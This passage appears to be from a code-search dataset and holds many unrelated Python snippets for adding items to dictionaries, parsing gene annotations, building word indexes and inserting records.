add(self, entry):\n \"An entry is a tuple of (id, datatime, text).\"\n id = entry[0]\n datee = entry[1]\n text = re.sub('[^A-Za-z0-9]+', ' ', entry[2].lower())\n self.recordsDict[id].create(id, datee, entry[2])\n for word in text.split():\n self.wordDict[word].add(id)", "def addOmimAnnotation(merged_data, OmimAnnotationFile):\n omim_genes = dict.fromkeys(list(OmimAnnotationFile['ENSID']))\n has_omim = []\n for index, row in merged_data.iterrows():\n human_ensid = str(row['Human ENSID'])\n if human_ensid in omim_genes:\n has_omim.append('t')\n else:\n has_omim.append('f')\n\n merged_data['Has Omim Annotation'] = has_omim\n return", "def _add_new_word(self, word):\n if word not in self.word_to_id:\n word_id = len(self.word_to_id)\n self.word_to_id[word] = word_id\n self.id_to_word[word_id] = word", "def append_data(dic,key,value):\n if(dic.has_key(key)):\n dic[key].append(value)\n else:\n dic[key] = [value]\n return dic", "def add_dict_entry(dictionary: dict, key: Any, value: Any) -> None:\n try:\n dictionary[key].append(value)\n except KeyError:\n dictionary[key] = [value]", "def buildDict(self, dict):\n for word in dict:\n self.add(word)", "def add(self, item):\n self._dict[item] = item", "def addItem(self, key):\n if key in self.dictionary:\n raise Exception(\"Key already exist in dictionary\")\n self.dictionary[key] = WordInformation(self.MAX_RATING)", "def __init__(self, taxid, species_name = None, lineage=None):\n self.genes = dict()\n self.taxid = taxid\n self.species = species_name\n self.lineage = lineage", "def printing_summary_gene_report(gene_dict):\n #Creating a summary report for data\n summary_gene_report = open('summary_gene_report.txt', 'w')\n summary_gene_report.write(\"Accesssion ID\\tDescription\\tCounts\\n\")\n for key in gene_dict:\n accession_ID=str(key) \n gene_description=str(gene_dict[key][0])\n gene_counts=str(gene_dict[key][1])\n summary_gene_report.write(accession_ID+\"\\t\"+gene_description+\"\\t\"+gene_counts+\"\\n\")\n summary_gene_report.close()", "def build_dictionary_gensim():\r\n\t# if load_dictionary_gensim():\r\n\t#\treturn\r\n\t\r\n\tglobal gensim_dictionary, common_corpus_list\r\n\t\r\n\tprint('\\nbuilding dictionary')\r\n\tgensim_dictionary = gensim.corpora.Dictionary()\r\n\t\r\n\tfor v in common_corpus_list:\r\n\t\tgensim_dictionary.add_documents([v[1].lower().split()])\r\n\t\t\r\n\tgensim_dictionary.save_as_text(paths.path_data_dictionary_txt)\r\n\tgensim_dictionary.save(paths.path_data_dictionary_dict)\r\n\r\n\t# 
print(gensim_dictionary.token2id)\r\n\tprint(gensim_dictionary)", "def addGene(self, *args):\n return _libsbml.Association_addGene(self, *args)", "def add_ngrams(mydict,sentence):\n ngrams = get_ngrams(sentence,2,3)\n for ngram in ngrams:\n if ngram in mydict:\n mydict[ngram]+=1\n else:\n mydict[ngram]=1\n return mydict", "def associate_node_id(tr, node=\"\"):\n return {\"id\": tr.get_uml_id(name=node)}", "def add_info(self, key, val):\r\n return self.add_infos((key, val))", "def gff3_parsed (gff3_file, sam_dic):\n\n #A special type of dictionary in which the values were saved in a list\n gff_dic = defaultdict(list)\n\n gff3_file = open(arg.gff3_infile)\n gff3_dic = {}\n\n gene_dic = {}\n exon_list = []\n gene_idx = 1\n\n counter_1 = 0\n counter_2 = 0\n counter_3 = 0\n counter_4 = 0\n counter_5 = 0\n counter_6 = 0\n counter_7 = 0\n idx_pseudogene = 0\n\n #A dictionary\n gene_idexes = {\"gene\": gene_idx, \"exon\": gene_idx,\n \"pseudogene\": \"pseudogene\"}\n\n\n for line in gff3_file:\n if line.startswith(\"##\"):\n pass\n elif line.startswith(\"#!\"):\n pass\n else:\n line_information = line.strip().split()\n\n # Make a dic with the genes present on Gg genome and its anotattion\n if line_information[2] == (\"gene\"):\n # deal with the PREVIOUS gene\n #This peace of code add to the gff3_dic(the main dic of gff3 file)\n #the information of which are the exons of one particular gene\n #Note: this happends at the same time that the gene information\n #were parsed\n if exon_list:\n gff3_dic[gene_idx][\"exon_list\"] = exon_list\n gene_idx += 1\n\n exon_list = []\n #parse the gene information and add this information to a new dic (gff3_dic)\n #with all the information related to the genes present in gff3 file (Cg_Nara5)\n # deal with CURRENT gene\n scaffold = line_information [0]\n gene_beg = line_information[3]\n gene_end = line_information [4]\n gene_loc = [gene_beg, gene_end]\n gene_strand = line_information[6]\n gene_information = line_information [8]\n gene_information = line.strip().split(\";\")\n gene_description = [gene_information[2]]\n gff3_dic[gene_idx] = {\"scaffold\": scaffold,\n \"gene_range\": gene_loc,\n \"description\": gene_description,\n \"exon_list\": None,\n \"strand\": gene_strand}\n\n # Make a list with the exons-genes present on Gg genome and its anotattion\n # If in this line the \"gene\" keyword is not present but the \"exon\"\n #keyword are append the range information to the exon list which\n # will be added to main gff3 dic\n elif line_information[2] == (\"exon\"):\n exon_beg = line_information[3]\n exon_end = line_information [4]\n exon_loc = (exon_beg, exon_end)\n exon_list.append(exon_loc)\n\n exon_information = line_information [8]\n exon_information = line.strip().split()[8].split(\";\")[0]\n gff3_dic[gene_idx][\"exon_reference\"] = exon_information\n #At the same time - regardless the previous code if the line has\n #any of this keywords the information of the gene_range were added\n # to the gff_dic.\n if line_information[2] in [\"gene\", \"exon\", \"pseudogene\"]:\n\n gene_range = (line_information[3], line_information[4])\n\n #Note: this peace of code happends because the gene description\n #of the gene is not the same as the exon description. 
Therefore,\n #the gene description has to be recovered\n\n if line_information[2] == \"gene\":\n gene_information = line_information [8]\n gene_information = line.strip().split(\";\")\n gene_description = [gene_information[2]]\n\n # Example:\n # gff_dic[scaffold1] = [[1, \"gene\", (82, 1159), description],\n # 1, \"exon\", (82, 603), description],\n # 2, \"gene\", (1440, 4998), description\n # pseudogene_idx, pseudogene, (1999, 3000)]]\n\n #To keep only the information regardless gene_idx (gene index)\n #to the gene or the exons present in this gene. When I have\n #pseudogenes, the gene index is replaced for pseudogene\n if line_information[2] in [\"exon\", \"gene\"]:\n idx = gene_idx\n else:\n idx_pseudogene += 1\n idx = \"pseudogene_\"+ str(idx_pseudogene)\n\n #add the previous information in a different format in which\n #the key is the sacffold and the values are the index (to easly\n #acess the information present in gff3 dictionary), the keyword\n #(gene, exon, pseudogene), the range, and the description.\n #All these informations will be used to perfome the SNP range\n # discover only within the true scaffold and not in all the scaffolds\n #present in the gff3 file. Making the code mor efficient and realibel\n gff_dic[line_information[0]].append([idx,\n line_information[2],\n gene_range,\n gene_description])\n\n # Add last exon list to last gene index\\\n else:\n if exon_list:\n gff3_dic[gene_idx][\"exon_list\"] = exon_list\n\n print (\"Step 3a - Parse the .gff3 file -- Done\")\n\n\n for locus, info_dict in sam_dic.items():\n\n # Get all info from current scaffold\n # scaffold_info is a list containing all genes, exons and pseudogenes\n # of the scaffold in sam_dic\n\n scaffold_info = gff_dic[info_dict[\"scaffold\"]]\n #we create two different \"values\" in the sam_dic dictionary with the len\n #of the real snp location in which all the \"values\" begin with \"intergenic\" or None\n #and as we make the check codes this values will be replaced for new\n # values or will be remain like this\n\n info_dict[\"element_type\"] = [\"intergenic\"] * len(info_dict[\"real_snp_localization\"])\n info_dict[\"element_range\"] = [None] * len(info_dict[\"real_snp_localization\"])\n info_dict[\"gene_index\"] = \"intergenic\"\n\n # Check if locus is in any range\n # The enumerate function give the value of the \"value\" as well as the\n #position of the value. Example: l = [\"a\", \"b\", \"c\"]\n #enumerate (l) --- (0, \"a\"); (1, \"b\"); (2, \"c\")\n #pos - the position of the snp in the list\n #snp - is the real snp localization under analyse\n\n # Get the position of the snp in the list. 
This position will\n # be used to create a key for the gene_inf_dic.\n for pos, snp in enumerate(info_dict[\"real_snp_localization\"]):\n # The \"element\" is the several lists present in the gff_dic.\n #Note: all the lists regardless the type has exactly the same length.\n # Example : [10459, \"gene\", (\"18930\", \"23805\"), [\"description=LysM domain-containing protein\"]\n #So for each list we will check if the SNP is in the range\n for element in scaffold_info:\n element_beg = int(element[2][0])\n element_end = int(element[2][1])\n element_range= range(element_beg, element_end)\n\n\n # YAY, one of the SNP matches one element of the scaffold\n if snp in element_range:\n\n info_dict[\"gene_index\"] = element[0]\n\n # ELEMENT KEY:\n # \"exon\": The SNP is in a coding region\n # \"gene\": The SNP is in an intron\n # \"pseudogene\": The SNP is in a pseudogene\n info_dict[\"element_type\"][pos] = element[1]\n\n info_dict[\"element_range\"][pos] = element[2]\n\n info_dict[\"description\"] = element[3]\n\n\n\n #Get the main statistics from our dataset\n\n for locus, locus_info in sam_dic.items():\n\n element_type = locus_info[\"element_type\"]\n\n # Adding information for loci in a intergenic region\n #The set return an object with only 1 \"element\" in that case \"intergenic\"\n #So if the locus has 2 snps 1 in a intergenic region and other in a gene\n # this locus will not count as a intergenic locus, because the set will\n #have two elenets {\"intergenic\", \"gene\"} and not only 1 {\"intergenic\"}.\n #Note: The set works for each element_type present in sam_dic (loop)\n if set(element_type) == {\"intergenic\"}:\n counter_1 += 1\n\n # Adding information for SNPs in intergenic region\n #This counter gives the number of times the intergenic word appears\n counter_2 += element_type.count(\"intergenic\")\n\n # Adding information for loci in pseudogenes\n if \"pseudogene\" in element_type:\n counter_3 += 1\n\n #Adding information for SNPs in pseudogene\n counter_4 += element_type.count(\"pseudogene\")\n\n #Adding information for loci in genes\n #As previously refered the gene information were recorded in two different formats\n #gene- when the SNP were in a gene but not in a exon (aka intron)\n #exon - when the SNP were in a gene and in a specific exon\n #So in order to have the statistics for the gene we need to search\n #booth keywords on the element_type . 
Not in this particular case the set\n #doesn\"t work because the set don\"t has an order (gene, exon) or (exon, gene)\n\n if \"gene\" in element_type or \"exon\" in element_type:\n counter_5 += 1\n\n #Adding information for SNPs in gene\n\n counter_6 += element_type.count(\"exon\") + element_type.count(\"gene\")\n\n #Adding information for SNPs in exons\n\n counter_7 += element_type.count(\"exon\")\n\n\n\n print(\"Data resume:\")\n print(\"Number of loci in a non coding region: {}\".format(counter_1))\n print(\"Number of SNPs in a non coding region: {}\".format(counter_2))\n\n print(\"Number of loci located in pseudogenes:{}\".format(counter_3))\n print(\"Number of SNPs located in pseudogenes:{}\".format(counter_4))\n\n print(\"Number of loci located in genes: {}\".format(counter_5))\n print(\"Number of SNPs located in genes: {}\".format(counter_6))\n print(\"Number of SNPs located in exons: {}\".format(counter_7))\n\n\n\n# print(gff3_dic[6207])\n return (sam_dic, gff3_dic)", "def add_event_to_trigger_dict(event):\n\n\tconverted_event = convert_event_for_output(event)\n\n\t# Use OGLE name for key pointing to event as value if availble.\n\tif converted_event.has_key(\"name_OGLE\") and converted_event[\"name_OGLE\"] != \"\":\n\t\tlogger.info(\"Event has OGLE name\")\n\t\tname_key = \"name_OGLE\"\n\n\t# Otherwise, use the MOA name.\n\telif converted_event.has_key(\"name_MOA\") and converted_event[\"name_MOA\"] != \"\":\n\t\tlogger.info(\"Event has MOA name and no OGLE name\")\n\t\tname_key = \"name_MOA\"\n\n\t# If there is a neither a MOA nor OGLE name, something has gone wrong, and we abort storing the event.\n\telse:\n\t\tlogger.warning(\"Event has neither OGLE nor MOA name item. Event:\\n\" + str(converted_event))\n\t\tlogger.warning(\"Aborting added event to event trigger dictionary...\")\n\t\treturn\n\n\tevent_name = converted_event[name_key]\n\tglobal event_trigger_dict\n\tevent_trigger_dict[event_name] = converted_event\n\tlogger.debug(\"Added following event to event trigger dictionary: %s\" % converted_event)", "def gene(self, idx, value):\r\n self.genes[idx] = value", "def add(self, record):\n self._hist_records[record.uid] = record", "def tallying_genes():\n #Creating a tallying Mechanism of genes with multiple sequences in file and\n # an output file for future alignment of sequences \n blast_hit_results = open('blast_hits_report.txt', 'r')\n gene_dict={}\n\n for line in blast_hit_results:\n data = line.split(\"\\t\")\n \n if line.startswith('SeqID'):\n continue\n else:\n #Test to see if organism in dictionary\n verdict = gene_dict.get(data[6])\n \n if str(verdict) == \"None\":\n #creating new entry\n key = data[6]\n seq_info=str(data[0])+\"|\"+str(data[1])\n counter = 1\n #Value[Counts, Trimmed_Length, Blast Length, Blast_Score, Blast_Percent_Identity]\n value=[data[5], counter, [seq_info]]\n gene_dict.update({key:value})\n else:\n #Fills dictionary based on organism name\n seq_info=str(data[0])+\"|\"+str(data[1])\n gene_dict[data[6]][1]+=1\n gene_dict[data[6]][2].append(seq_info)\n blast_hit_results.close()\n return(gene_dict)", "def insert_file_to_dictionary():\r\n file = open(sys.argv[1], \"r\")\r\n #movies is my the dictionary\r\n movies = {}\r\n for line in file:\r\n read = line.strip().split(', ')\r\n for i in range(1, len(read)):\r\n if not read[i] in movies:\r\n movies[read[i]] = {read[0]}\r\n else:\r\n movies[read[i]].add(read[0])\r\n return movies", "def add(self, rec):\n #print(\"ADD REC={}\".format(rec))\n if self._disable_insert:\n return\n if self._is_mem:\n key = 
'#'.join([rec['ts'], rec['user'], rec['narr']])\n if key in self._rkeys:\n self._add_duplicate()\n self._rkeys.add(key)\n cursor = self._sq.cursor()\n rec['name'] = rec['name'][19:] # strip 'biokbase.narrative.'\n values = [rec[c] for c in self.COLUMNS]\n ivalues = []\n for v in values:\n if isinstance(v, float):\n ivalues.append('{:f}'.format(v))\n else:\n ivalues.append('\"' + v + '\"')\n stmt = self._insert_stmt.format(values=','.join(ivalues))\n # add record\n try:\n cursor.execute(stmt)\n except sqlite3.IntegrityError:\n self._add_duplicate()\n cursor.close()", "def __add_author(self, key_name, others_names, personal_information):\n for name in others_names:\n self.author_to_authorID[name] = (key_name, personal_information)", "def add_mod_interaction_links(self, gene_id):\n xref_dict = {}\n page = 'gene/MODinteractions_genetic'\n\n individual_prefix, individual_body, _ = self.etlh.rdh2.split_identifier(gene_id)\n individual_url = self.etlh.rdh2.return_url_from_identifier(gene_id, page)\n\n # Exception for MGI\n if individual_prefix == 'MGI':\n xref_dict['displayName'] = gene_id\n xref_dict['id'] = gene_id\n xref_dict['globalCrossRefId'] = gene_id\n xref_dict['primaryKey'] = gene_id + page\n else:\n xref_dict['displayName'] = individual_body\n xref_dict['id'] = individual_body\n xref_dict['globalCrossRefId'] = individual_body\n xref_dict['primaryKey'] = individual_body + page\n\n xref_dict['prefix'] = individual_prefix\n xref_dict['localId'] = individual_body\n xref_dict['crossRefCompleteUrl'] = individual_url\n xref_dict['uuid'] = str(uuid.uuid4())\n xref_dict['crossRefType'] = page\n xref_dict['page'] = page\n xref_dict['reference_uuid'] = str(uuid.uuid4())\n\n# For matching to the gene when creating the xref relationship in Neo.\n xref_dict['dataId'] = gene_id\n # Add the gene_id of the identifier to a global list so we don't create unnecessary xrefs.\n self.successful_mod_interaction_xrefs.append(gene_id)\n\n return xref_dict", "def add_tag (self,tag,key):\r\n\r\n #with shelf\r\n\r\n if self.using_shelf:\r\n\r\n if tag in self.tag_dict:\r\n\r\n self.tag_dict[tag].add(key)\r\n\r\n else:\r\n\r\n self.tag_dict[tag] = {key}\r\n\r\n #with database\r\n\r\n if self.using_database:\r\n\r\n value_tuple = (notebookname, tag, key,)\r\n db_cursor.execute(\"INSERT OR REPLACE \"\r\n +\"INTO tags_to_keys \"\r\n +\"(notebook, tag, keyword) \"\r\n +\"VALUES (?,?,?);\",value_tuple)", "def addtagDic(dic_i,tag,tag_str,setint=False):\n if( len( tag_str ) ):\n dic_i[tag] = []\n for id_s in tag_str.split():\n if( setint ):\n dic_i[tag].append(int(id_s))\n else:\n dic_i[tag].append(id_s)\n \n return dic_i", "def addtagDic(dic_i,tag,tag_str,setint=False):\n if( len( tag_str ) ):\n dic_i[tag] = []\n for id_s in tag_str.split():\n if( setint ):\n dic_i[tag].append(int(id_s))\n else:\n dic_i[tag].append(id_s)\n \n return dic_i", "def add(self, key, value):\n if not key in self:\n self.keys.append(key)\n self.dict[key] = value", "def add_IFD(metadata: dict, ifd: str) -> dict:\n if ifd not in metadata:\n metadata.update({ifd: {}})\n\n return metadata", "def _add_bridge_db_identifiers(map_dict) -> dict:\n sys.stdout.write(\"Adding BridgeDB identifiers...\\n\")\n r_session = base_utils.requests_retry_session()\n\n for uniq_id in tqdm.tqdm(map_dict, total=len(map_dict)):\n parts = uniq_id.split(':')\n db = parts[0]\n uid = parts[-1]\n\n if db in constants.BRIDGEDB_MAP:\n # list of other DBs to query from\n q_dbs = constants.BRIDGEDB_MAP[db]\n for q_db in q_dbs:\n try:\n r = r_session.get(\n 
'http://webservice.bridgedb.org/Human/xrefs/{}/{}?dataSource={}'.format(\n constants.BRIDGEDB_KEYS[db],\n uid,\n constants.BRIDGEDB_KEYS[q_db]\n )\n )\n except Exception as x:\n print(\"%s: %s\" % (uniq_id, x.__class__.__name__))\n continue\n\n result = r.text\n if len(result) > 0:\n add_ids = [line.split('\\t')[0] for line in result.split('\\n')[:-1]]\n new_ids = ['{}:{}'.format(q_db, i) for i in add_ids if i.isalnum()]\n for n_id in new_ids:\n new_id = '{}:{}'.format(q_db, n_id)\n map_dict[uniq_id].add(new_id)\n\n time.sleep(0.5)\n\n return map_dict", "def add(self, key, val, comment='') :\n \n # add lines:\n self.outfile.append('\\n')\n if len(comment) > 0 : self.outfile.append('! %s\\n' % comment)\n self.outfile.append('%s : %s\\n' % (key, str(val)))\n\n # add to dictionairy:\n self.values[key] = val\n \n # ok\n return", "def create_ner_tags_dict():\r\n global ne_tags_set, ner_to_id, ne_tags, id_to_ner\r\n\r\n ne_tags = list(ne_tags_set) + ['[CLS]', '[SEP]']\r\n ne_tags.sort()\r\n id_to_ner = {idx: tag for idx, tag in enumerate(ne_tags)}\r\n ner_to_id = {tag: idx for idx, tag in enumerate(ne_tags)}\r\n print(f'Total NER tag size: {len(ne_tags)}; Tags: {ne_tags}')", "async def add_dict(self, dic):\n for key in dic:\n await self.set(key, dic[key])", "def add_gene_ids(self, genes_list):\n orig_num_genes = len(self.genes)\n\n for g in list(set(genes_list)):\n if not self.genes.has_id(g):\n new_gene = GenePro(id=g, pdb_file_type=self.pdb_file_type, root_dir=self.genes_dir)\n if self.model:\n self.model.genes.append(new_gene)\n else:\n self.genes.append(new_gene)\n\n log.info('Added {} genes to GEM-PRO project'.format(len(self.genes)-orig_num_genes))", "def add_taxonomy(tax_idx, pkl):\n for tax,v in tax_idx.items():\n for genome_id,genome_len in v.items():\n T = '|'.join(list(tax) + ['t__' + genome_id])\n pkl['taxonomy'][T] = ('', int(genome_len))\n return pkl", "def addInfo(label: str, value: str):\r\n\r\n if not self.isClosed:\r\n if label not in self.__identity_info.keys():\r\n self.__identity_info[label] = value\r\n else:\r\n raise HDDOPermissionException('Tried to add existing identity information twice to a HealthDominoDataObject.')\r\n else:\r\n raise HDDOPermissionException('Tried to add identity information to a closed HealthDominoDataObject.')", "def add_node(self, node):\n try:\n self.dict.setdefault(node, OrderedDict())\n except (AttributeError, TypeError):\n raise \"Node Value must be hashable value\"", "def record(self, record_meta: Dict[str, Set[str]]):\n if \"ft.onto.base_ontology.Phrase\" not in record_meta.keys():\n record_meta[\"ft.onto.base_ontology.Phrase\"] = set()", "def add_item(dct,item):\r\n if item not in dct[0]:\r\n print \"itemNotFound \",str(item)\r\n return False\r\n\r\n num=len(item)\r\n if num in dct:\r\n if item in dct[num]:\r\n return False\r\n else:\r\n dct[num].append(item)\r\n return True\r\n else:\r\n dct[num]=[item]\r\n return True", "def dictagnum(kind, fname):\n\n with open(fname, 'r') as g:\n g.next()\n g.next()\n m = g.next()\n startdict = agline(m)\n genold = startdict['gen']\n\n f = open(fname)\n f.next()\n f.next()\n d = {}\n y = '1'\n nb = []\n for l in f:\n adict = agline(l)\n ks = kind + 's'\n gen = adict['gen']\n well = adict['well']\n\n if adict['gen'] not in d:\n d[gen] = []\n \n if gen != genold:\n d[genold].append(sum(nb))\n nb = []\n else: \n if adict['well'] != y:\n d[gen].append(sum(nb))\n nb = []\n \n if kind == 'charge':\n if adict[ks] == 'x':\n nb.append(0)\n elif int(adict[ks]) >= 0 and (adict['charget'] == 'c' or \n 
adict['charget'] == 'o'):\n nb.append(1)\n elif adict[ks] == '-':\n pass\n #print('nb', nb)\n\n if kind == 'escd' or kind == 'escm':\n if adict[ks] == '':\n nb.append(0)\n elif int(adict[ks]) >= 0:\n nb.append(1)\n elif adict[ks] == '-':\n pass\n\n y = adict['well']\n genold = adict['gen']\n \n d[gen].append(sum(nb))\n \n return(d)", "def insert(self, word):\r\n t = self.trie\r\n \r\n for w in word: \r\n if w not in t: \r\n t[w] = {}\r\n t = t[w]\r\n t['#'] = True\r\n print(self.trie)", "def build_doid_omim_dict(obo_file):\n obo_fh = open(obo_file, 'r')\n doid_omim_dict = {}\n\n # This statement builds a list of the lines in the file and reverses\n # its order. This is because the list 'pop()' method pops out list\n # elements starting from the end. This way the lines will be read in\n # the following loop in order, from top to bottom of the file.\n obo_reversed_str_array = obo_fh.readlines()[::-1]\n\n while obo_reversed_str_array: # Loop adapted from Dima @ Princeton\n line = obo_reversed_str_array.pop()\n line = line.strip()\n if line == '[Term]':\n while line != '' and obo_reversed_str_array:\n line = obo_reversed_str_array.pop()\n\n if line.startswith('id:'):\n doid = re.search('DOID:[0-9]+', line)\n if doid:\n doid = doid.group(0)\n\n if line.startswith('xref: OMIM:'):\n # If term has OMIM xref, get it and add it to the\n # doid_omim_dict. Otherwise, ignore.\n omim = re.search('[0-9]+', line).group(0)\n\n if doid not in doid_omim_dict:\n doid_omim_dict[doid] = set()\n if omim not in doid_omim_dict[doid]:\n doid_omim_dict[doid].add(omim)\n\n return doid_omim_dict", "def add_to_dict(param_dict):\n ### Sample - Int\n sample_s = param_dict['ml_args'].sample_s\n ### Sample - Mr\n sample_Mr = param_dict['ml_args'].sample_Mr\n ## Sample volume\n # Units (Mpc/h)**3\n volume_sample = { '18': 37820 / 0.01396,\n '19': 6046016.60311 ,\n '20': 2.40481e7 ,\n '21': 8.79151e7 }\n vol_mr = volume_sample[sample_s]\n ##\n ## Choice of Centrals and Satellites\n cens = int(1)\n sats = int(0)\n ## Other constants\n # Speed of light - In km/s\n speed_c = ac.c.to(u.km/u.s).value\n ## Number of CPU's to use\n cpu_number = int(cpu_count() * param_dict['cpu_frac'])\n ##\n ## Plotting constants\n plot_dict = { 'size_label':23,\n 'size_title':25,\n 'color_ham' :'red',\n 'color_dyn' :'blue'}\n ##\n ## Catalogue Prefix string\n catl_str_fig = param_dict['ml_args'].catl_alg_comp_fig_str()\n ##\n ## Saving to `param_dict`\n param_dict['sample_s' ] = sample_s\n param_dict['sample_Mr' ] = sample_Mr\n param_dict['vol_mr' ] = vol_mr\n param_dict['cens' ] = cens\n param_dict['sats' ] = sats\n param_dict['speed_c' ] = speed_c\n param_dict['cpu_number' ] = cpu_number\n param_dict['plot_dict' ] = plot_dict\n param_dict['catl_str_fig'] = catl_str_fig\n\n return param_dict", "def add_a_record(self, record):\n '''\n doc = { \"P/N\": record,#record.get_PN(),\n \"supplier\": \"\",\n \"inventory\": \"\",\n \"specification\": \"\",\n \"description\": \"\",\n \"OEM\": \"\",\n \"tags\": [\"mongodb\", \"python\", \"pymongo\"],\n \"date\": datetime.datetime.utcnow()}'''\n self.collection.insert(record)", "def addToExtra(self,key,val):\n if self.extra == None: \n self.extra = {} \n self.extra[key] = val", "def newPhraseInfo(phrase):\n return {\"count\":0,\n \"ids\":set(),\n \"phrase\":phrase\n }", "def add_friend(individual, friend, friend_dict):\n\n #if the individual is not yet added to the friend_dict\n if individual not in friend_dict:\n friend_dict[individual] = set()\n\n # add the individual set of immediate friends of 
'individual'\n # using a set, so there are no duplicate names \n friend_dict[individual].add(friend)", "def add(self, obj, match_dict):\r\n for match_key in match_dict.keys():\r\n assert match_key in self.keys_to_track\r\n\r\n for key_to_track in self.keys_to_track:\r\n if match_dict.has_key(key_to_track):\r\n match_val = match_dict[key_to_track]\r\n if match_val is None or match_val == '':\r\n pass\r\n else:\r\n self.tracker[key_to_track][match_val] = obj", "def append(self, CID, client, rat):\n global masterDict\n try:\n masterDict.update(self.genCase(CID, client, rat))\n return (1) # append sucessful\n except Exception:\n return (0) # error occured, handle in calling method", "def add_key_value(self, key, value):\n key = self._metadata_map().get(key, key)\n if key in ['dateAdded', 'lastModified']:\n self._data[key] = self.util.any_to_datetime(value).strftime('%Y-%m-%dT%H:%M:%SZ')\n elif key == 'confidence':\n self._data[key] = int(value)\n elif key == 'rating':\n self._data[key] = float(value)\n elif key == 'unique_id':\n self._unique_id = quote(self.fully_decode_uri(value), safe='')\n else:\n self._data[key] = value", "def add_to_dict ( self, key_0, key_1, list_2 ):\n\n old_value_0 = self._dd_dict.get( key_0 ) # value for key 0\n if old_value_0 is None:\n self._dd_dict[ key_0 ] = { key_1: list_2 }\n else:\n # need to merge a value into old_value_0 which is a dict in the self....\n old_value_0[ key_1 ] = list_2\n\n self.print_dd_dict()\n\n\n print( self._dd_dict )\n # could return but it is a mutate\n return", "def entrez_gene_id(self, entrez_gene_id: int):\n\n self._entrez_gene_id = entrez_gene_id", "def _stream_dict_add(sb, n, i=None):\n if i is None:\n key = n\n else:\n key = \"{}[{}]\".format(n, i)\n stream_dict[key] = sb", "def _add_record(days_dict, record, key):\n days_dict[key] = {\n \"Name\": record[\"title\"],\n \"Owner\": record[\"owner\"],\n \"Severity\": record[\"severity\"],\n \"Created\": (time.strftime(SIRPPipeline.TIME_FMT, time.gmtime(record[\"createdAt\"] / 1000.0))),\n }\n if \"endDate\" in record:\n days_dict[key].update(\n {\n \"Closed\": (time.strftime(SIRPPipeline.TIME_FMT, time.gmtime(record[\"endDate\"] / 1000.0),)),\n \"Resolution\": record[\"resolutionStatus\"],\n }\n )", "def add(self, obj):\n ID = id(obj)\n self.pDict[ID] = obj\n return ID", "def insert(self, word):\n level = self.trie\n for c in word:\n if c in level:\n level = level[c]\n else:\n level[c] = {}\n level = level[c]\n level[self.end] = 1", "def __setitem__(self, key, value):\n Identifier.checkIdentifier(key)\n self.graph.saveExtendedAttributes(self.entityId, {key: value})", "def add_unique(word, unique_words, unique):\n\tunique_words[word]=unique", "def add_entry(self, entry):\n if self.get_entry(entry):\n return entry\n\n keys, values = [], []\n for i in entry:\n keys.append(\"'{}'\".format(i))\n if not isinstance(entry[i], str):\n values.append(\"'{}'\".format(str(entry[i])))\n else:\n values.append(\"'{}'\".format(entry[i]))\n\n keys.append(\"'hash'\")\n values.append(\"'{}'\".format(self._calculate_hash(entry)))\n sql = 'INSERT INTO {t_id} ({keys}) VALUES ({values})'.format(\n t_id=self.table_id, keys=','.join(keys), values=','.join(values))\n self.fusiontables.query().sql(sql=sql).execute()", "def _gen_id(event):\n eid = np.sort(np.unique(event))\n iid = {}\n for i in xrange(len(eid)):\n iid[eid[i]] = i\n return len(eid), eid, iid", "def add_entry_to_bibtex_db(self, ent):\n\n # add additional fields manually to the dict\n ent.consolidate_dict()\n 
self.bibtex_db.entries.append(ent.raw_dict)\n # the following updates the entries dict\n # self.bibtex_db.get_entry_dict()\n # # make sure it's there\n # if ent.ID not in self.bibtex_db.entries_dict:\n # self.bibtex_db.entries_dict[ent.ID] = ent.raw_dict", "def insert(self, word: str):\n tree = self.lookup\n for a in word:\n if a not in tree:\n tree[a] = {}\n tree = tree[a]\n # 单词结束标志\n tree[\"#\"] = \"#\"", "def __add_to_word_dict__(self, word, tag):\n if self.word_dict.get(word, None) is None:\n self.word_dict[word] = defaultdict(int)\n self.word_dict[word][tag] += 1", "def add_genesets(snp_dict,gene_file):\n inf = open(gene_file,\"r\")\n for i in snp_dict.keys():\n snp_dict[i]['genes']=np.empty(len(snp_dict[i]['bps']), dtype=set)\n for line in inf:\n if re.match(\"\\#\",line):\n continue\n line.rstrip()\n fields=line.split()\n if len(fields) < 3:\n continue\n bps=int(fields[1])\n if fields[0] in snp_dict.keys():\n idx = snp_dict[fields[0]]['bps'].searchsorted(bps)\n if (idx < len(snp_dict[fields[0]]['bps'])) and snp_dict[fields[0]]['bps'][idx] == bps:\n snp_dict[fields[0]]['genes'][idx]=set([ x for x in fields[2:] ])\n return True", "def insert(self, key, val):\n self.dict.setdefault(key, []).append(val)", "def add_record(self, record: Dict, src_name: SourceName) -> None:\n concept_id = record[\"concept_id\"]\n record[\"src_name\"] = src_name.value\n label_and_type = f\"{concept_id.lower()}##identity\"\n record[\"label_and_type\"] = label_and_type\n record[\"item_type\"] = \"identity\"\n try:\n self.batch.put_item(Item=record)\n except ClientError as e:\n logger.error(\n \"boto3 client error on add_record for \"\n f\"{concept_id}: {e.response['Error']['Message']}\"\n )\n for attr_type, item_type in ITEM_TYPES.items():\n if attr_type in record:\n value = record.get(attr_type)\n if not value:\n continue\n if isinstance(value, str):\n items = [value.lower()]\n else:\n items = {item.lower() for item in value}\n for item in items:\n self._add_ref_record(\n item, record[\"concept_id\"], item_type, src_name\n )", "def update_utr_info(ensembl_info, word, value):\n if \"utr\" in word:\n if \"start\" in word:\n if \"5\" in word:\n ensembl_info[\"utr_5_start\"] = int(value)\n elif \"3\" in word:\n ensembl_info[\"utr_3_start\"] = int(value)\n elif \"end\" in word:\n if \"5\" in word:\n ensembl_info[\"utr_5_end\"] = int(value)\n elif \"3\" in word:\n ensembl_info[\"utr_3_end\"] = int(value)\n return ensembl_info", "def add_node(self, n):\n self.node_dict.setdefault(n, OrderedDict())", "def store_g(self, gui_id, key, a):\n if gui_id in self.SMGData.keys():\n if key in self.SMGData[gui_id].keys():\n self.SMGData[gui_id][key] = a\n else:\n raise Exception('Key is gui_id does not exist in the data structure')\n else:\n raise Exception('Gui id does not exist in the data structure')", "def _insert_in_metadata_fits_safe(self, key, value):\n from .core import _short_names\n\n if key in _short_names and isinstance(self.meta, fits.Header):\n # This keyword was (hopefully) added by autologging but the\n # combination of it and its value not FITS-compliant in two\n # ways: the keyword name may be more than 8 characters and\n # the value may be too long. 
